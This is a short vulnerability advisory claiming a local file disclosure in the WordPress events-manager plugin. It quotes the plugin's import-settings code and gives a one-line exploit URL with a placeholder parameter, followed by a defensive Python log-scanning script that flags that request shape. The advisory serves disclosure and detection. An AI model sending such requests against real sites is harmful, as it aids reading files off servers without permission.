Wordpress Plugin events-manager - Local File Disclosure

2020.02.12
Risk: Medium
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

[-] Title: Wordpress Plugin events-manager - Local File Disclosure
[-] Author: mehran feizi
[-] Category: webapps
[-] Date: 2020.02.12
==============================================================================
Vulnerable page:
/em-options.php
==============================================================================
Vulnerable Source:
209: file_get_contents $settings = file_get_contents($_FILES['import_settings_file']['tmp_name']);
requires:
206: if(!empty($_REQUEST['action']) && (($_REQUEST['action'] == 'import_em_settings' && check_admin_referer('import_em_settings')) || (is_multisite() && $_REQUEST['action'] == 'import_em_ms_settings' && check_admin_referer('import_em_ms_settings'))) && em_wp_is_super_admin ())
208: if(!empty($_FILES['import_settings_file']['size']) && is_uploaded_file($_FILES['import_settings_file']['tmp_name']))
4: ⇓ function em_options_save()
==============================================================================
Exploit:
localhost/wp-content/plugins/events-manager/admin/em-options.php?import_settings_file=[LFD]
==============================================================================
contact me:
telegram: @MF0584
gmail: mehranfeizi13841384@gmail.com
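For defenders, the request shape given in the Exploit line can be searched for in web server access logs. The following Python is an added example, not part of the original advisory or the plugin; it assumes common/combined log format, and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote

# Path and parameter name come from the advisory's "Exploit:" line.
TARGET = "/wp-content/plugins/events-manager/admin/em-options.php"
PARAM = "import_settings_file"

# Common/combined log format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})\b'
)

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Feb/2020:10:00:01 +0000] "GET /wp-content/plugins/'
    'events-manager/admin/em-options.php?import_settings_file=%5BLFD%5D HTTP/1.1" 200 0',
    '198.51.100.7 - - [12/Feb/2020:10:00:05 +0000] "GET /wp-admin/index.php HTTP/1.1" 200 5120',
    '192.0.2.10 - - [12/Feb/2020:10:00:09 +0000] "GET //wp-content/plugins/'
    'events-manager/admin/em-options.php?x=1&import%5Fsettings%5Ffile=a.txt HTTP/1.1" 500 0',
    '198.51.100.7 - - [12/Feb/2020:10:01:00 +0000] "GET /wp-content/plugins/'
    'events-manager/admin/em-options.php HTTP/1.1" 200 0',
    'not an access log line',
]

def find_probes(lines):
    """Return one dict per request to em-options.php that carries the
    import_settings_file query parameter."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected log format
        raw_path, _, query = m["target"].partition("?")
        # Decode, collapse repeated slashes and lowercase before comparing.
        path = re.sub(r"/+", "/", unquote(raw_path)).lower()
        if not path.endswith(TARGET):
            continue
        # parse_qs also decodes percent-encoded parameter names.
        values = parse_qs(query, keep_blank_values=True).get(PARAM)
        if values is None:
            continue
        hits.append({"ip": m["ip"], "time": m["time"],
                     "status": m["status"], "values": values})
    return hits

if __name__ == "__main__":
    for hit in find_probes(SAMPLE_LOG):
        print(hit)
```

Direct requests to a plugin's admin PHP file are unusual in normal WordPress use, so hits are worth reviewing even when the response status is an error.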



Copyright 2020, cxsecurity.com

 
